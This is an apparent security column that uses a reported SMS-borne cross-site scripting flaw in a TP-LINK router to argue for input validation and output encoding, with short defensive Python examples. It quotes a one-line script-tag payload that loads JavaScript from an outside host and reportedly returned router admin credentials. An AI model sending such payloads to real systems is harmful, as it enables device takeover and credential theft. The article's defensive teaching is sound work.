Van Wyk: Get a Handle on Your Data

April 13, 2017 | Data Loss Prevention (DLP)
By Ken Van Wyk, IANS Faculty



“Imagine dropping a squirrel into the middle of a golden retriever conference.”

That's a pretty simple sentence, right? In a word processor, it’s just English text data. But when you mix in human imagination, it becomes something far more dynamic (either that, or you need an imagination upgrade).

So, why was anyone surprised when it was announced that a TP-LINK router contained a vulnerability that could be exploited by sending it an SMS text containing “<script src=//n.ms/a.js></script>”?

Remember, one person’s data is another person’s active content.

Sure, that JavaScript shouldn’t have given the attacker a copy of the router’s admin username and password, but it did (reportedly, anyway; I haven’t verified it, but for the purpose of this discussion, let's assume it to be accurate). After all, SMS should simply consist of a phone number and 160 characters of static alphanumeric text data.

Just data, right?

I always tell the software developers I work with that it is absolutely vital they know their data, inside and out. Bear in mind, too, that data is transient. It can be static text in one context and something altogether different in another – much like the squirrel example above. The important thing is that the software team knows the data in its software, as well as how it is transported and consumed in every context.

The rule of thumb is that data should be validated on the input side to ensure it conforms to what the recipient is expecting, and it should be filtered on the output side to ensure it cannot cause any harm where it is being consumed.
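The input half of that rule can be sketched as an allowlist check. This is only a minimal illustration: the function name `is_valid_sms_body` and the character policy are assumptions made for the example, not how any real router or SMS gateway validates messages, and real SMS character sets are much larger.

```python
import re

# Hypothetical policy for illustration only: letters, digits, spaces and
# a little punctuation, at most 160 characters.
SMS_MAX_LEN = 160
SMS_ALLOWED = re.compile(r"[A-Za-z0-9 .,!?'\-]*")


def is_valid_sms_body(body: str) -> bool:
    """Return True only if the body conforms to the assumed allowlist."""
    if len(body) > SMS_MAX_LEN:
        return False
    # fullmatch requires every character to be in the allowed set.
    return SMS_ALLOWED.fullmatch(body) is not None
```

An allowlist states what should be there and rejects everything else, which is easier to reason about than a list of known-bad strings. It does not replace filtering on the output side, since perfectly legitimate text may still be dangerous in some downstream context.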

In other words, that “<script src=//n.ms/a.js></script>” should have been filtered out by whatever component was sending untrusted data (it came from the user, after all) into an HTML interpreting environment. At a bare minimum, the “<” should become “&lt;” and so on. In practice, it’s more complicated, because you also have to anticipate malicious input data that is encoded using one of a variety of encoding schemes. Nonetheless, the untrusted data should have been prevented from causing harm downstream where it was consumed.
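The bare-minimum output encoding described above might look like the following sketch, which uses `html.escape` from the Python standard library. The wrapper `render_sms_as_html` is a hypothetical name chosen for this example, and the sketch covers only text placed inside an HTML element; attribute, URL, and script contexts each need their own encoding rules.

```python
import html


def render_sms_as_html(body: str) -> str:
    """Encode untrusted text before placing it inside an HTML element."""
    # html.escape turns &, <, > (and quotes, with quote=True) into entities,
    # so the browser displays the text instead of interpreting it as markup.
    return "<p>" + html.escape(body, quote=True) + "</p>"


print(render_sms_as_html("<script src=//n.ms/a.js></script>"))
# prints: <p>&lt;script src=//n.ms/a.js&gt;&lt;/script&gt;</p>
```

Encoding at the point of output means the component that knows the consuming context is the one that defangs the data, whatever path the data took to get there.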

But, it wasn’t.

At the downstream end, the HTML interpreting engine would have no way of knowing if the data was intentional or not, so of course it was going to run the script. Mind you, the mere presence of a script like “a.js” that returns the administrative username and password should also be viewed as a lapse in judgment on someone’s part. Build it and they will come — or, in this case, build it and someone will run it.

Getting to the Root of the Problem

So ultimately, there’s culpability to go around in this case. But the main point I want to make is that you need to know your data. Know what should be there and block all else. Prevent untrusted data from causing harm downstream. “Defang” the data before handing it to someone else. Failing to do these things will lead to bad results every time.

This shouldn’t even be a new lesson to us. Remember buffer overflows? It’s actually a very similar problem. Shove a bunch of machine code into a buffer on the stack, along with enough extra data to overwrite the saved return address (itself just data) so that it ends up pointing to the memory address of the machine code. And voilà: Your machine code data becomes executing machine code – machine code that was passed to the victim by way of a “data” channel (yes, there are many protections against these things in modern CPU architectures, but that’s beside the point).

Clearly, this whole intermingling of data and executable content – or “active content” as it’s often called in web application environments – isn’t a problem we’ve solved yet. We’ve applied a bit of duct tape and bubble gum here and there, but the problem persists.

I recently overheard a colleague who, while discussing highly secure web browser environments, said, “You absolutely have to block active content.” Of course, this doesn't make much sense, because what's active in one context is passive in another. So whenever I hear those words, I just chuckle to myself and think, "Go jump in a lake."


***

Ken Van Wyk is president and principal consultant at KRvW Associates and an internationally recognized information security expert, author and speaker. He’s been an infosec practitioner in commercial, academic, and military organizations and was one of the founders of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.

